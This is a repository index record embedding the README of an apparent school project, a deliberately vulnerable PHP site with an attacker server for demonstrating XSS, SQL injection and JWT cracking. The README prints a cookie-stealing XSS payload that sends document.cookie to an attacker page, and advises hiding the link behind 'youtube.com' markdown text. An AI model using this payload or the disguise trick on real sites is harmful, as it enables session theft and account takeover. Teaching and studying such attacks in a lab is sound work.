{"id":18395665,"url":"https://github.com/lukeuke/xss_showcase","last_synced_at":"2025-04-12T13:53:30.861Z","repository":{"id":233326301,"uuid":"787009508","full_name":"Lukeuke/xss_showcase","owner":"Lukeuke","description":"xss with mysqli showcase in php","archived":false,"fork":false,"pushed_at":"2024-04-16T21:22:10.000Z","size":770,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-16T02:24:14.324Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Lukeuke.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-04-15T18:05:27.000Z","updated_at":"2024-04-15T18:05:40.000Z","dependencies_parsed_at":"2024-04-15T19:55:43.642Z","dependency_job_id":"9f25c51c-2c49-4c6f-bbcc-aa2f35deafe6","html_url":"https://github.com/Lukeuke/xss_showcase","commit_stats":null,"previous_names":["lukeuke/xss_showcase"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lukeuke%2Fxss_showcase","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lukeuke%2Fxss_showcase/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lukeuke%2Fxss_showcase/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lukeuke%2Fxss_showcase/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Lukeuke","download_url":"https://codeload.github.com/Lukeuke/xss_showcase/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248576530,"owners_count":21127427,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-06T02:11:38.994Z","updated_at":"2025-04-12T13:53:30.842Z","avatar_url":"https://github.com/Lukeuke.png","language":"PHP","funding_links":[],"categories":[],"sub_categories":[],"readme":"# XSS and MySQLi vulnerability website\n\u003e Made for school project\n\n## Table of Contents\n1. [Installation](#installation)\n2. [Attacks](#attacks)\n3. [About](#about)\n4. [How does it work?](#how-does-it-work)\n\n## Installation\n\n### Requirements\n1. XAMPP\n2. Node.js \u003e= v18.x.x\n3. NPM \u003e= 8.19.2\n\n### Installation steps\n\n#### Victim's PC\n1. Install XAMPP\n2. Open XAMPP's ``htdocs folder``\n3. Create folder called ``XSS_Example`` and Open it\n4. Clone this repo ```git clone https://github.com/Lukeuke/xss_showcase.git``` or download ZIP and extract into the following folder\n5. Create database called ``xss_attack_db`` and import ``xss_attack_db.sql``\n6. Open your website on your browser. Url will be probably ``localhost/XSS_Example`` if you did all the steps correctly\n7. Then select the ``victim`` folder\n\n#### Attacker's PC\n1. Make sure you have ``NODE.js`` and ``NPM`` installed\n2. Go to ``attacker`` folder in your cloned repo in htdocs\n3. Open Console/Terminal and type ```npm i``` or ```npm install```\n4. After this ``node_modules`` folder should be created\n5. Open Console/Terminal and type ``ipconfig`` and grab your local network IP. It will be most probably Ethernet or Wireless Adapter and IP probably be something like ``192.168.x.x``\n6. In attacker folder open in your code editor of choice file ``server.js`` and change this section to your matching local network IP\n```js\n36. app.listen(3000, '192.168.1.100'); // Change this -\u003e '192.168.1.100'\n```\n7. Do the same with ``index.html`` Open and change to your local IP in 22 line.\n8. ```fetch(\"http://x.x.x.x:3000/\"``` change only this where is ``x``\n9. Run the server. In Console/Terminal type ``node server.js``\n\n##### If you did all the steps correctly you should have both attacker and victim page running\n\n## Attacks\n\n### XSS\n\u003ehint: Products search is vulnerable for XSS attack. try typing in search input: \u003cscript\u003ealert('XSS')\u003c/script\u003e\n\n### MySql Injection\n\u003e Try to find one. There are RAW sql queries. Not escaped.\n\n### JWT Signature bruteforce\n\u003e install https://github.com/lmammino/jwt-cracker and try to bruteforce the JWT Signing Key\n\n## About\nThis project shows how can you grab someones JWT token by XSS attack. If your victim is logged in you simply sends them:\n  \n  http://localhost/XSS_example/victim/products.php?search=%3Cscript%3Ewindow.location.replace(`http://localhost/XSS_example/attacker/index.html?${document.cookie}`)%3C/script%3E\n\nor if you are using chat app that supports markdown you can embed this link so its more hidden, like this:\n  \n  ```md\n[youtube.com](http://localhost/XSS_example/victim/products.php?search=%3Cscript%3Ewindow.location.replace(`http://localhost/XSS_example/attacker/index.html?${document.cookie}`)%3C/script%3E)\n  ```\n\non the chat he will see that the link is actually the youtube.com but in reality it grabs his token and sends it to you. Example how it will look:\n\n[youtube.com](http://localhost/XSS_example/victim/products.php?search=%3Cscript%3Ewindow.location.replace(`http://localhost/XSS_example/attacker/index.html?${document.cookie}`)%3C/script%3E)\n\n## How does it work?\n  It injects the \u003cscript\u003e\u003c/script\u003e tag into your DOM\n  and then executes JavaScript Code which is:\n  \n  ```js\n  window.location.replace(`http://localhost/XSS_example/attacker/index.html?${document.cookie}`)\n  ```\n  \n  it replaces your URL with attackers website and grabs your cookies from vulnerable website.\n  In cookies are stored JWT.\n  If the attacker have your JWT then also have access to your whole account.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flukeuke%2Fxss_showcase","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flukeuke%2Fxss_showcase","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flukeuke%2Fxss_showcase/lists"}